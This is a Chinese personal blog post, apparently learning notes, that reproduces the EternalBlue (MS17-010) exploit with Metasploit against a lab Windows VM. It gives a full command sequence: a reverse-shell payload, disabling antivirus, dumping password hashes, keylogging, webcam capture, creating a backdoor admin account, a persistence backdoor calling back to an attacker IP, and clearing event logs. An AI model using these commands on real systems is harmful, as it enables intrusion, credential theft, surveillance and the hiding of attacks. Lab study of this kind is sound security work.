<!DOCTYPE html>


<html lang="en">


<head>
  <meta charset="utf-8" />
    
  <meta name="description" content="一枚小菜鸡~" />
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    永恒之蓝 - 勒索病毒 |  Syraer&#39;s Blog
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
  
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

  
  

  

</head>

</html>

<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-WannaCry"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  永恒之蓝 - 勒索病毒
</h1>
 

    </header>
     
    <div class="article-meta">
      <a href="/2020/11/27/WannaCry/" class="article-date">
  <time datetime="2020-11-27T03:49:25.000Z" itemprop="datePublished">2020-11-27</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/WannaCry/">WannaCry</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">3.9k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">14 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <p><strong>目录</strong></p>
<p><a href>Metasploit</a></p>
<p><a href>使用方法</a></p>
<p><a href>ms17-010漏洞复现</a></p>
<p><a href>1. 主机发现</a></p>
<p><a href>2. 进入MSF框架</a></p>
<p><a href>3. 使用ms17-010扫描模块，对靶机进行扫描</a></p>
<p><a href>4. 使用ms17-010攻击模块，对靶机进行攻击</a></p>
<p><a href>后渗透阶段</a></p>
<p><a href>Post后渗透模块</a></p>
<p><a href>查看目标主机是否运行在虚拟机上</a></p>
<p><a href>关闭杀毒软件</a></p>
<p><a href>访问文件系统</a></p>
<p><a href>下载/上传文件</a></p>
<p><a href>权限提升</a></p>
<p><a href>获取用户密码</a></p>
<p><a href>运行程序</a></p>
<p><a href>屏幕截图</a></p>
<p><a href>创建新账号</a></p>
<p><a href>启用远程桌面</a></p>
<p><a href>键盘记录</a></p>
<p><a href>进程迁移</a></p>
<p><a href>禁止目标主机使用键盘鼠标</a></p>
<p><a href>用目标主机摄像头拍照</a></p>
<p><a href>使用扩展库</a></p>
<p><a href>生成持续性后门</a></p>
<p><a href>清除事件日志</a></p>
<hr>
<h1 id="Metasploit"><a href="#Metasploit" class="headerlink" title="Metasploit"></a>Metasploit</h1><p>Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了。在kali中，自带了Metasploit工具。</p>
<p><em>MSF的更新</em>：apt update</p>
<p>​                         apt install metasploit-framework</p>
<h2 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a><em>使用方法</em></h2><ul>
<li>​    进入框架：msfconsole</li>
<li>​    使用search命令查找相关漏洞： search  ms17-010</li>
<li>​    使用use进入模块:  use exploit/windows/smb/ms17_010_eternalblue   </li>
<li>​    使用info查看模块信息： info </li>
<li>​    设置攻击载荷：set payload windows/x64/meterpreter/reverse_tcp</li>
<li>​    查看模块需要配置的参数：show options</li>
<li>​    设置参数：set  RHOST  192.168.125.138</li>
<li>​    攻击：exploit /  run </li>
<li>​    后渗透阶段</li>
</ul>
<p>不同的攻击用到的步骤也不一样，接下来我们用永恒之蓝ms17-010来熟悉一下MSF工具的使用</p>
<hr>
<h1 id="ms17-010漏洞复现"><a href="#ms17-010漏洞复现" class="headerlink" title="ms17-010漏洞复现"></a>ms17-010漏洞复现</h1><p><em>描述</em></p>
<p>Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞，恶意代码会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。</p>
<p><em>影响版本</em></p>
<p>目前已知受影响的Windows 版本包括但不限于：WindowsNT，Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows 2008 R2、Windows Server 2012 SP0</p>
<p><em>复现环境</em></p>
<p>攻击机： kali</p>
<p>靶机：win server 2008 r2  (192.168.1.8)</p>
<hr>
<p><strong>复现过程</strong></p>
<h2 id="1-主机发现"><a href="#1-主机发现" class="headerlink" title="1. 主机发现"></a>1. 主机发现</h2><p>nmap进行ip端口扫描</p>
<p><img src="/2020/11/27/WannaCry/1605156853686.png" alt="img"></p>
<p>扫描到开放了445端口，而永恒之蓝利用的就是445端口的smb服务，操作系统溢出漏洞</p>
<h2 id="2-进入MSF框架"><a href="#2-进入MSF框架" class="headerlink" title="2. 进入MSF框架"></a>2. 进入MSF框架</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">search ms17-010</span><br></pre></td></tr></table></figure>

<p><img src="/2020/11/27/WannaCry/1605156861825.png" alt="img"></p>
<p>这里可以得到两个工具，其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞</p>
<p>exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码，一般配合使用，前者先扫描，若显示有漏洞，再进行攻击。</p>
<h2 id="3-使用ms17-010扫描模块，对靶机进行扫描"><a href="#3-使用ms17-010扫描模块，对靶机进行扫描" class="headerlink" title="3. 使用ms17-010扫描模块，对靶机进行扫描"></a>3. 使用ms17-010扫描模块，对靶机进行扫描</h2><p><em>使用模块</em></p>
<p>​     该模块不会直接在攻击机和靶机之间建立访问，它们只负责执行扫描，嗅探，指纹识别等相关功能以辅助渗透测试。</p>
<p>​      <code>msf&gt; use auxiliary/scanner/smb/smb_ms17_010</code></p>
<p><em>查看模块需要配置的参数</em></p>
<p>​     <code>show option</code> </p>
<p><img src="/2020/11/27/WannaCry/1605156137683.png" alt="img"></p>
<p>​              右边Required为yes的选项说明左边 Current Setting 这个项对应的需要填写，比如Rhoststs</p>
<p><em>设置攻击目标</em></p>
<p>​     RHOSTS 参数是要探测主机的ip或ip范围（比如 192.168.125.125-129.168.125.140 或者 192.168.1.0/24）</p>
<p>​    <code> set rhosts  192.168.1.8</code></p>
<p><em>再次查看配置参数</em></p>
<p>​    <code>show options </code></p>
<p><em>执行扫描</em></p>
<p>​    <code> run</code>    </p>
<p>​              <img src="/2020/11/27/WannaCry/1605156143487.png" alt="img"></p>
<p>​              显示主机很可能能够会受到永恒之蓝漏洞的攻击</p>
<h2 id="4-使用ms17-010攻击模块，对靶机进行攻击"><a href="#4-使用ms17-010攻击模块，对靶机进行攻击" class="headerlink" title="4. 使用ms17-010攻击模块，对靶机进行攻击"></a>4. 使用ms17-010攻击模块，对靶机进行攻击</h2><p>   <code>use exploit/windows/smb/ms17_010_eternalblue</code></p>
<p><em>查看这个漏洞的信息</em></p>
<p>​    <code>info</code></p>
<p><em>查看可攻击的系统平台，这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统</em></p>
<p>​    <code>show targets</code></p>
<p>​    <img src="/2020/11/27/WannaCry/1605156152253.png" alt="img"></p>
<p>​     这里只有一个，有些其他的漏洞模块对操作系统的语言和版本要求的很严，比如MS08_067，这样就要我们指定目标系统的版本的。如果不设置的话，MSF会自动帮我们判断目标操作系统的版本和语言(利用目标系统的指纹特征)</p>
<p><em>查看攻击载荷</em></p>
<p>​    攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码，成功渗透目标后，用于在目标系统上运行任意命令</p>
<p>   <code> show payloads</code></p>
<p>​    该命令可以查看当前漏洞利用模块下可用的所有Payload</p>
<p><img src="/2020/11/27/WannaCry/1605156871417.png" alt="img"></p>
<p><em>设置攻击载荷</em></p>
<p>​     <code>set payload windows/x64/meterpreter/reverse_tcp</code></p>
<p><em>查看配置参数</em></p>
<p>​      <code>show options </code></p>
<p><em>设置目标攻击ip</em></p>
<p>​     <code> set rhosts 192.168.1.8</code>  (如果有多个攻击目标ip间直接用空格隔开就行)</p>
<p><em>设置用于接收从目标机弹回来的shell</em></p>
<p>​    <code>set  LHOST 192.168.1.11</code></p>
<p><em>执行攻击</em></p>
<p>​    <code>exploit（run） </code><img src="/2020/11/27/WannaCry/1605156878162.png" alt="img"></p>
<h2 id="后渗透阶段"><a href="#后渗透阶段" class="headerlink" title="后渗透阶段"></a><strong>后渗透阶段</strong></h2><p>运行了exploit命令之后，我们开启了一个reverse TCP监听器来监听本地的 4444 端口，即我（攻击者）的本地主机地址（LHOST）和端口号（LPORT）。运行成功之后，我们将会看到命令提示符 meterpreter &gt; 出现，我们输入： shell  即可切换到目标主机的windows shell，要想从目标主机shell退出到 meterpreter ，我们只需输入：exit</p>
<p><img src="/2020/11/27/WannaCry/1605156884361.png" alt="img"></p>
<p>要想从 meterpreter 退出到MSF框架，输入：background     </p>
<p><img src="/2020/11/27/WannaCry/1605156186145.png" alt="img">      </p>
<p>输入  <code>sessions -l</code>   查看我们获得的shell</p>
<p>输入  <code>sessions -i 1</code>  即可切换到id为1的shell</p>
<p>​            <img src="/2020/11/27/WannaCry/1605156197116.png" alt="img"></p>
<ul>
<li> Post后渗透模块</li>
</ul>
<p>在meterpreter &gt; 中我们可以使用以下的命令来实现对目标的操作</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">​```</span><br><span class="line">sysinfo             <span class="comment">#查看目标主机系统信息</span></span><br><span class="line">run scraper         <span class="comment">#查看目标主机详细信息</span></span><br><span class="line">run hashdump        <span class="comment">#导出密码的哈希</span></span><br><span class="line">load kiwi           <span class="comment">#加载</span></span><br><span class="line">ps                  <span class="comment">#查看目标主机进程信息</span></span><br><span class="line"><span class="built_in">pwd</span>                 <span class="comment">#查看目标当前目录(windows)</span></span><br><span class="line">getlwd              <span class="comment">#查看目标当前目录(Linux)</span></span><br><span class="line">search -f *.jsp -d e:\                <span class="comment">#搜索E盘中所有以.jsp为后缀的文件</span></span><br><span class="line">download  e:\test.txt  /root          <span class="comment">#将目标机的e:\test.txt文件下载到/root目录下</span></span><br><span class="line">upload    /root/test.txt d:\<span class="built_in">test</span>      <span class="comment">#将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              #查看当前Meterpreter Shell的进程</span></span><br><span class="line">PIDmigrate 1384     <span class="comment">#将当前Meterpreter Shell的进程迁移到PID为1384的进程上</span></span><br><span class="line">idletime            <span class="comment">#查看主机运行时间</span></span><br><span class="line">getuid              <span class="comment">#查看获取的当前权限</span></span><br><span class="line">getsystem           <span class="comment">#提权</span></span><br><span class="line">run  killav         <span class="comment">#关闭杀毒软件</span></span><br><span class="line">screenshot          <span class="comment">#截图</span></span><br><span class="line">webcam_list         <span class="comment">#查看目标主机的摄像头</span></span><br><span class="line">webcam_snap         <span class="comment">#拍照</span></span><br><span class="line">webcam_stream       <span class="comment">#开视频</span></span><br><span class="line">execute  参数  -f 可执行文件   <span class="comment">#执行可执行程序</span></span><br><span class="line">run getgui -u hack -p 123    <span class="comment">#创建hack用户，密码为123</span></span><br><span class="line">run getgui -e                <span class="comment">#开启远程桌面</span></span><br><span class="line">keyscan_start                <span class="comment">#开启键盘记录功能</span></span><br><span class="line">keyscan_dump                 <span class="comment">#显示捕捉到的键盘记录信息</span></span><br><span class="line">keyscan_stop                 <span class="comment">#停止键盘记录功能</span></span><br><span class="line">uictl  <span class="built_in">disable</span>  keyboard     <span class="comment">#禁止目标使用键盘</span></span><br><span class="line">uictl  <span class="built_in">enable</span>   keyboard     <span class="comment">#允许目标使用键盘</span></span><br><span class="line">uictl  <span class="built_in">disable</span>  mouse        <span class="comment">#禁止目标使用鼠标</span></span><br><span class="line">uictl  <span class="built_in">enable</span>   mouse        <span class="comment">#允许目标使用鼠标</span></span><br><span class="line">load                         <span class="comment">#使用扩展库</span></span><br><span class="line">run				             <span class="comment">#使用扩展库</span></span><br><span class="line">run persistence -X -i 5 -p 8888 -r 192.168.10.27        <span class="comment">#反弹时间间隔是5s 会自动连接</span></span><br><span class="line">                                   192.168.27的4444端口，缺点是容易被杀毒软件查杀</span><br><span class="line">portfwd add -l 3389 -r 192.168.11.13 -p 3389     <span class="comment">#将192.168.11.13的3389端口转发到本地的3389端口上，这里的192.168.11.13是获取权限的主机的ip地址</span></span><br><span class="line">clearev                       <span class="comment">#清除日志</span></span><br></pre></td></tr></table></figure>

<p> 下面的模块主要用于在取得目标主机系统远程控制权后，进行一系列的后渗透攻击动作。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">run post/windows/manage/migrate                  <span class="comment">#自动进程迁移     </span></span><br><span class="line">run post/windows/gather/checkvm                  <span class="comment">#查看目标主机是否运行在虚拟机上     </span></span><br><span class="line">run post/windows/manage/killav                   <span class="comment">#关闭杀毒软件     </span></span><br><span class="line">run post/windows/manage/enable_rdp               <span class="comment">#开启远程桌面服务     </span></span><br><span class="line">run post/windows/manage/autoroute                <span class="comment">#查看路由信息     </span></span><br><span class="line">run post/windows/gather/enum_logged_on_users     <span class="comment">#列举当前登录的用户     </span></span><br><span class="line">run post/windows/gather/enum_applications        <span class="comment">#列举应用程序     </span></span><br><span class="line">run windows/gather/credentials/windows_autologin <span class="comment">#抓取自动登录的用户名和密码     </span></span><br><span class="line">run windows/gather/smart_hashdump                <span class="comment">#dump出所有用户的hash</span></span><br></pre></td></tr></table></figure>

<h3 id="查看目标主机是否运行在虚拟机上"><a href="#查看目标主机是否运行在虚拟机上" class="headerlink" title="查看目标主机是否运行在虚拟机上"></a><em>查看目标主机是否运行在虚拟机上</em></h3><p><img src="/2020/11/27/WannaCry/1605156207711.png" alt="img"></p>
<h3 id="关闭杀毒软件"><a href="#关闭杀毒软件" class="headerlink" title="关闭杀毒软件"></a>关闭杀毒软件</h3><p>拿到目标主机的shell后第一件事就是关闭掉目标主机的杀毒软件，通过命令：</p>
<p>​    <code>run killav</code></p>
<p><img src="/2020/11/27/WannaCry/1605156214541.png" alt="img"></p>
<h3 id="访问文件系统"><a href="#访问文件系统" class="headerlink" title="访问文件系统"></a>访问文件系统</h3><p>Meterpreter支持非常多的文件系统命令（基本跟Linux系统命令类似，这里就不演示了）</p>
<p><img src="/2020/11/27/WannaCry/1605156894153.png" alt="img"></p>
<h3 id="下载-上传文件"><a href="#下载-上传文件" class="headerlink" title="下载/上传文件"></a>下载/上传文件</h3><p><code>download file</code>   从目标主机下载文件</p>
<p><code>upload file </code>       上传文件到目标主机</p>
<p><img src="/2020/11/27/WannaCry/1605156231462.png" alt="img"></p>
<p>​     这里下载的文件的路径默认在家目录下</p>
<h3 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h3><p>有的时候，你可能会发现自己的 Meterpreter 会话受到了用户权限的限制，而这将会严重影响你在目标系统中的活动。比如说，修改注册表、安装后门或导出密码等活动都需要提升用户权限，而Meterpreter给我们提供了一个 getsystem 命令，它可以使用多种技术在目标系统中实现提权</p>
<p><code>getuid</code>  获取当前用户的信息</p>
<p><img src="/2020/11/27/WannaCry/1605156237546.png" alt="img"></p>
<p>可以看到，当我们使用 getsystem进行提权后，用户身材为  NT AUTHORITY\SYSTEM ，这个也就是Windows的系统权限</p>
<h3 id="获取用户密码"><a href="#获取用户密码" class="headerlink" title="获取用户密码"></a>获取用户密码</h3><p>执行 ：<code>run hashdump</code></p>
<p>hashdump 模块可以从SAM数据库中导出本地用户账号, 该命令的使用需要系统权限</p>
<p><img src="/2020/11/27/WannaCry/1605156253323.png" alt="img"></p>
<p>从上图可知，导出了三个用户名及密码，输出格式为，用户名：SID：LM哈希：NTLM哈希::: </p>
<p>我们来破解用户名为chenchen的用户密码，可以复制 NTLM哈希去在线网站如 <a href=".?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2~all~sobaiduend~default-1-104044002.nonecase&utm_term=%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E6%80%8E%E4%B9%88%E9%80%80%E5%87%BAshell&spm=1000.2123.3001.4430">www.cmd5.com </a>破解</p>
<p><img src="/2020/11/27/WannaCry/1605156261338.png" alt="img"></p>
<h3 id="运行程序"><a href="#运行程序" class="headerlink" title="运行程序"></a>运行程序</h3><p>查看目标主机安装了哪些应用</p>
<p><code>run post/windows/gather/enum_applications</code></p>
<p><img src="/2020/11/27/WannaCry/1605156270775.png" alt="img"></p>
<p>可以使用 execute 命令在目标系统中执行程序。使用方法如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">execute  参数  -f  可执行文件</span><br></pre></td></tr></table></figure>

<blockquote>
<p>可选参数：</p>
<p>-f：指定可执行文件</p>
<p>-H：创建一个隐藏进程</p>
<p>-a：传递给命令的参数</p>
<p>-i：  跟进程进行交互</p>
<p>-m：从内存中执行</p>
<p>-t： 使用当前伪造的线程令牌运行进程</p>
<p>-s： 在给定会话中执行进程</p>
</blockquote>
<p><img src="/2020/11/27/WannaCry/1605156281145.png" alt="img"></p>
<p>如果我想执行它某个应用程序的话，该怎么实现？？</p>
<h3 id="屏幕截图"><a href="#屏幕截图" class="headerlink" title="屏幕截图"></a>屏幕截图</h3><p>输入 ： <code>screenshot </code> 即可对目标主机的当前使用屏幕进去屏幕截取</p>
<p><img src="/2020/11/27/WannaCry/1605156293200.png" alt="img"></p>
<h3 id="创建新账号"><a href="#创建新账号" class="headerlink" title="创建新账号"></a>创建新账号</h3><p>查看目标主机有哪些账户</p>
<p><code>run post/windows/gather/enum_logged_on_users</code></p>
<p><img src="/2020/11/27/WannaCry/1605156301211.png" alt="img"></p>
<p>接着，我们在目标机中创建一个新的账号  ： <code>run getgui -u hack -p 123</code>  ，这个命令会创建用户，并把他添加到 Administrators 组中，这样该用户就拥有远程桌面的权限了。</p>
<p>这里成功创建了用户，但是添加到Administrators组中失败了 ？？why</p>
<p><img src="/2020/11/27/WannaCry/1605156307135.png" alt="img"></p>
<p>如果添加到Administrators组中失败了的话，我们可以运行：shell ，进行cmd窗口手动将该用户添加到administrators组中。</p>
<h3 id="启用程桌面"><a href="#启用程桌面" class="headerlink" title="启用程桌面"></a>启用程桌面</h3><p>当我们新添加的用户已经拥有远程桌面之后，我们就可以使用这个账号凭证来开启远程桌面会话了。</p>
<p>我们可以通过运行getuid脚本帮我们开启目标主机的远程桌面，可以使用-e参数确保目标设备开启了远程桌面功能（重启之后同样会自动开启），我们输入： run getgui -e  或者  run post/windows/manage/enable_rdp</p>
<p>在目标机上右键属性远程桌面确实被打开了</p>
<p>在开启远程桌面会话之前，我们还需要使用“idletime”命令检查远程用户的空闲时长： idletime  ，这一步不太懂？？</p>
<p><img src="/2020/11/27/WannaCry/1605156313657.png" alt="img"></p>
<p>然后怎么通过远程桌面用我们创建的用户登录目标主机？后面再来解答</p>
<h3 id="键盘记录"><a href="#键盘记录" class="headerlink" title="键盘记录"></a>键盘记录</h3><p>Meterpreter还可以在目标设备上实现键盘记录功能，键盘记录主要涉及以下三种命令：</p>
<blockquote>
<blockquote>
<p>keyscan_start：开启键盘记录功能</p>
<p>keyscan_dump：显示捕捉到的键盘记录信息</p>
<p>keyscan_stop：停止键盘记录功能</p>
</blockquote>
</blockquote>
<p>在使用键盘记录功能时，通常需要跟目标进程进行绑定，接下来我们介绍如何绑定进程，然后获取该进程下的键盘记录 </p>
<h3 id="进程迁移"><a href="#进程迁移" class="headerlink" title="进程迁移"></a>进程迁移</h3><p>Meterpreter 既可以单独运行，也可以与其他进程进行绑定。因此，我们可以让Meterpreter与类似explorer.exe这样的进程进行绑定，并以此来实现持久化。</p>
<p>在下面的例子中，我们会将Meterpreter跟 winlogon.exe 绑定，并在登录进程中捕获键盘记录，以获得用户的密码。</p>
<p>首先，我们需要使用： ps  命令查看目标设备中运行的进程：</p>
<p><img src="/2020/11/27/WannaCry/1605156320615.png" alt="img"></p>
<p>我们可以使用：  getpid  查看我们当前的进程id</p>
<p>使用： migrate  目标进程ID 命令来绑定目标进程id，这里绑定目标pid的时候，经常会断了 shell。进程迁移后会自动关闭原来进程，没有关闭可使用  kill  pid  命令关闭进程。或者使用自动迁移进程（run post/windows/manage/migrate）命令，系统会自动寻找合适的进程然后迁移</p>
<p><img src="/2020/11/27/WannaCry/1605156325319.png" alt="img"></p>
<p>进程迁移绑定完成后，就可以开始捕获键盘数据了</p>
<p>运行键盘记录功能的命令</p>
<p><img src="/2020/11/27/WannaCry/1605156329137.png" alt="img"></p>
<p>我在目标机上进行了按键操作为何不记录？？</p>
<h3 id="禁止目标主机使用键盘鼠标"><a href="#禁止目标主机使用键盘鼠标" class="headerlink" title="禁止目标主机使用键盘鼠标"></a>禁止目标主机使用键盘鼠标</h3><ul>
<li>禁止(允许)目标使用键盘：<code> uictl  disable (enable) keyboard</code></li>
<li>禁止(允许)目标使用鼠标： <code>uictl  disable (enable) mouse</code></li>
</ul>
<p><img src="/2020/11/27/WannaCry/1605156333863.png" alt="img"></p>
<p>what？？</p>
<h3 id="用目标主机摄像头拍照"><a href="#用目标主机摄像头拍照" class="headerlink" title="用目标主机摄像头拍照"></a>用目标主机摄像头拍照</h3><ul>
<li>获取目标系统的摄像头列表：<code>webcam_list</code></li>
<li>•从指定的摄像头，拍摄照片：<code>webcam_snap</code></li>
<li>•从指定的摄像头，开启视频：<code>webcam_stream</code></li>
</ul>
<h2 id><a href="#" class="headerlink" title></a><img src="/2020/11/27/WannaCry/1605156340725.png" alt="img"></h2><p>我这里没有摄像头就不演示了</p>
<h3 id="使用扩展库"><a href="#使用扩展库" class="headerlink" title="使用扩展库"></a>使用扩展库</h3><p>使用 <code>load -l </code> 查看扩展库</p>
<p><img src="/2020/11/27/WannaCry/1605156346302.png" alt="img"></p>
<h3 id="生成持续性后门"><a href="#生成持续性后门" class="headerlink" title="生成持续性后门"></a>生成持续性后门</h3><p>因为 meterpreter 是基于内存DLL建立的连接，所以，只要目标主机关机，我们的连接就会断。总不可能我们每次想连接的时候，每次都去攻击，然后再利用 meterpreter 建立连接，这样太麻烦了。所以，我们得在目标主机系统内留下一个持续性的后门，只要目标主机开机了，我们就可以连接到该主机。</p>
<p>建立持续性后门有两种方法</p>
<ul>
<li>通过启动项启动</li>
<li>通过服务启动</li>
</ul>
<p>启动项启动</p>
<p>用这种方法的话，我们先生成一个后门工具   ，传送门 –&gt;  <a target="_blank" rel="noopener" href="https://mp.csdn.net/postedit/104089663">用msf生成一个后门木马</a></p>
<p>然后放到windows的启动目录中：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</span><br></pre></td></tr></table></figure>

<p>服务启动</p>
<p>通过服务启动，我们可以运行命令 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run persistence -X -i 5 -p 8888 -r 192.168.43.226</span><br></pre></td></tr></table></figure>

<p><img src="/2020/11/27/WannaCry/1605156352420.png" alt="img"></p>
<p>注释反弹时间间隔是5s， 会自动连接192.168.43.226的4444端口，缺点是容易被杀毒软件查杀</p>
<p>然后它就在目标机新建了这个文件：C:\Windows\TEMP\CJzhFlNOWa.vbs ，并把该服务加入了注册表中，只要开机就会启动</p>
<p>在目标主机可以看到这样一个文件夹，是一个VBScript脚本</p>
<p><img src="/2020/11/27/WannaCry/1605156358041.png" alt="img"></p>
<p>查看靶机的端口连接情况  netstat -an  可以看到靶机连着我们的8888端口</p>
<p><img src="/2020/11/27/WannaCry/1605156365042.png" alt="img"></p>
<p>靶机进行重启后，查看端口状态确实是连着的，但是msf断了又得重新exploit，如何通过留的后门进入靶机而不是通过msf进行进入到靶机里面？</p>
<h3 id="清除事件日志"><a href="#清除事件日志" class="headerlink" title="清除事件日志"></a>清除事件日志</h3><p>完成攻击操作之后，千万别忘了“打扫战场”。我们的所有操作都会被记录在目标系统的日志文件之中，因此我们需要在完成攻击之后使用命令  clearev  命令来清除事件日志：</p>
<p><img src="/2020/11/27/WannaCry/1605156371141.png" alt="img"></p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://www.zzugo.ayxyj.cn/2020/11/27/WannaCry/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/WannaCry/" rel="tag">WannaCry</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2020/11/29/EVM_Source/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            以太坊源码分析 - 交易源码分析
          
        </div>
      </a>
    
    
      <a href="/2020/11/23/docker_%E7%9A%84%E7%A7%81%E6%9C%89registry/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">Docker Registry - 搭建本地仓库并测试</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "TeJhVuUSrasQYTxdBWOzzhfN-gzGzoHsz",
    app_key: "0zHtp5jbdUnzBM9aw0joIGOa",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2018-2021
        <i class="ri-heart-fill heart_icon"></i> Syraer
      </li>
    </ul>
